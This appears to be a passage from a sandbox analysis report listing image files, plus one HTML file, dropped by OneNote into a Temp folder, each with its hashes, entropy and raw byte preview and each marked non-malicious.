                                                                                                                                            SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                            SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                            SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{27F0414B-BE60-4DC1-AD13-49FE0BC3137E}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, progressive, precision 8, 1692x810, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):88911
                                                                                                                                            Entropy (8bit):7.701779182597222
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:4a+us0Yfpw9/WFi5HrTy2NtTWR7f2f5RNzQiiiiiiiiiiiiiimL1Vmwwn:4aA0YRw9/WITtTWR7IbNzvL1an
                                                                                                                                            MD5:4D5F7AFD30851031376DA0FA6D0E3F80
                                                                                                                                            SHA1:02154E502F09DDD49FFB8F55D0651FFCD7379B94
                                                                                                                                            SHA-256:F918BB0C65D2F90593265FE4087B9C6905148BD7B46579D902B9ABD5415415F5
                                                                                                                                            SHA-512:ED8BF498C66F59D252DA77CA490B067AF4106F3EA421A024C1C56D2AB63037B0E8BA71961D06370DB76773B08E1BE298C770395DD6CB131F2CE48BDF1D11711B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{27F2AECC-4E56-4C10-B2AB-FAE75782451B}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 85 x 470, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11197
                                                                                                                                            Entropy (8bit):7.975073010774664
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:p9wNdtRKcVHso6zsqm06xaqZdingVzLZ7/PGSIz/yycRTbChh/JzhbEx15RGb:mdtMcVHqgAqTinMzLZ7/uSIz/yTR/mhF
                                                                                                                                            MD5:DDC3CC30794277500EFE4BC6667EC123
                                                                                                                                            SHA1:EFC9642C1F95B5FC38764476AE481649C016FA0C
                                                                                                                                            SHA-256:7F5B660A1A0BF46C75AAF19B4F77A0E086DE003EC03AFC1F58D871D55AA5BA9E
                                                                                                                                            SHA-512:25232A84604C3959634D33090238FEC8D51E40AD84EB3A08BB8522A81BE1E83378649C014E98E1DFCDF46B7BFAC92D8D2429211CD11D7EE0334C9C3DF7C1B6A6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...U.........1x5.....PLTE....................................e........................................................s...............x..........................o..............................................................................................................................................................~.............................m...............................................j...............................................p.......z......................................................x..............|........................................v.......................y..........................................................h...........................................................................P..{....bKGD....H....cmPPJCmp0712....H.s...(SIDATx^.}i@S..N....h...!..)....AI%..p.L."a..)..`U..,h..:O.b.:.j+.Z).b..zN.s..{O...&|..N}...${....~.....k}.[k}{.o^.D_..W:35ly..7rL....6n0.A...b

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{28D642BB-439B-4D7F-A8DA-778723F026BE}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{29C1AA19-5059-46A3-9908-B6D2D5EB7DEE}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2599
                                                                                                                                            Entropy (8bit):7.903700862190034
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                            MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                            SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                            SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                            SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{2A2E1B21-2976-442C-A197-5347D0C30866}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1570
                                                                                                                                            Entropy (8bit):7.780157858994452
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                            MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                            SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                            SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                            SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{2A3F31E9-1790-4FDD-9A8D-1BA1817ABF14}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7374
                                                                                                                                            Entropy (8bit):7.955141875077912
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                            MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                            SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                            SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                            SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{2AAA1D72-13A0-492B-A25E-5FB975CD4F2A}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4847
                                                                                                                                            Entropy (8bit):7.950192613458318
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                            MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                            SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                            SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                            SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{2ACB03C0-2B4D-4AE6-9A8D-2C4DB2CADD57}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11449
                                                                                                                                            Entropy (8bit):7.91552812501629
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                            MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                            SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                            SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                            SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{2BEF95BE-C13E-4F2A-A258-EEADAAEBAF43}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1570
                                                                                                                                            Entropy (8bit):7.780157858994452
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                            MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                            SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                            SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                            SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{2C34D276-5DAE-4003-B502-FE5C84E63E57}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{2DB654AE-7A4B-4EC1-A400-59F5A4A3EC67}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{2DB9A2D8-EF35-4B9D-AA73-8A59B9CE424D}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3679
                                                                                                                                            Entropy (8bit):7.931319059366604
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                            MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                            SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                            SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                            SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{2DBE074E-3D06-4501-9335-81847E634E3A}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (1260), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2071
                                                                                                                                            Entropy (8bit):4.6535465810065695
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:5C9/KCeWPfdZ4WPe+G+7LrMjFA45MIostil:c9i0dZ4J+57GA45XowM
                                                                                                                                            MD5:C9D2355FC2BE90B0FA73ECB67061A77E
